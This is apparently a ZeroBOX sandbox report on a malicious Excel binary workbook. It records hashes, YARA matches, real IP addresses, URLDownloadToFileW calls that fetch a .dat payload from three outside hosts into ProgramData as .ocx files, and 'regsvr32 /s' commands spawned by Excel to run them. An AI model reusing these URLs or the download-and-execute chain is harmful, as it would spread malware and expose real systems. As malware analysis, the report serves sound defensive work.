popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

SNC-66168115-Apr-6.xlsb

Malicious Library Excel Binary Workbook file format(xlsb)
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 April 7, 2022, 5:29 p.m. April 7, 2022, 5:32 p.m.
Size 1.2MB
Type Microsoft Excel 2007+
MD5 a0e3a2e0777164a03e52cfd9978113af
SHA256 3b3bdd8384db003a3b4f702b9aeb6c20db506bed7f3d3539ea5a22a6d1ba4f6f
CRC32 FF201740
ssdeep 24576:GF+BnmJkeGC2PbA/HMoNYIPeuVe2HHCkm6CyIwl6hafINeWHWR72vF+BnmJkeGC9:6ymaeGC9YSeQHCkXC/wl6LcW2929ymaW
Yara
  • xlsb - Excel Binary Workbook file format detection
  • Malicious_Library_Zero - Malicious_Library

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
104.225.129.111 Active Moloch
164.124.101.2 Active Moloch
212.46.38.179 Active Moloch
91.234.254.131 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

suspicious_features Connection to IP address suspicious_request GET http://212.46.38.179/7790983516.dat
suspicious_features Connection to IP address suspicious_request GET http://91.234.254.131/7790983516.dat
request GET http://212.46.38.179/7790983516.dat
request GET http://91.234.254.131/7790983516.dat
file C:\ProgramData\Frister.ocx
file C:\ProgramData\Frister1.ocx
file C:\ProgramData\Frister2.ocx
Time & API Arguments Status Return Repeated

NtCreateFile

 create_disposition: 2 (FILE_CREATE)
file_handle: 0x000003f0
filepath: C:\Users\test22\AppData\Local\Temp\~$SNC-66168115-Apr-6.xlsb
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$SNC-66168115-Apr-6.xlsb
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0
cmdline regsvr32 /s C:\ProgramData\Frister.ocx
cmdline regsvr32 /s C:\ProgramData\Frister2.ocx
cmdline regsvr32 /s C:\ProgramData\Frister1.ocx
host 104.225.129.111
host 212.46.38.179
host 91.234.254.131
Time & API Arguments Status Return Repeated

URLDownloadToFileW

 url: http://104.225.129.111/7790983516.dat
stack_pivoted: 0
filepath_r: C:\ProgramData\Frister.ocx
filepath: C:\ProgramData\Frister.ocx
2148270085 0

URLDownloadToFileW

 url: http://212.46.38.179/7790983516.dat
stack_pivoted: 0
filepath_r: C:\ProgramData\Frister1.ocx
filepath: C:\ProgramData\Frister1.ocx
2148270088 0

URLDownloadToFileW

 url: http://91.234.254.131/7790983516.dat
stack_pivoted: 0
filepath_r: C:\ProgramData\Frister2.ocx
filepath: C:\ProgramData\Frister2.ocx
2148270088 0
parent_process excel.exe martian_process regsvr32 /s C:\ProgramData\Frister.ocx
parent_process excel.exe martian_process regsvr32 /s C:\ProgramData\Frister2.ocx
parent_process excel.exe martian_process regsvr32 /s C:\ProgramData\Frister1.ocx
dead_host 104.225.129.111:80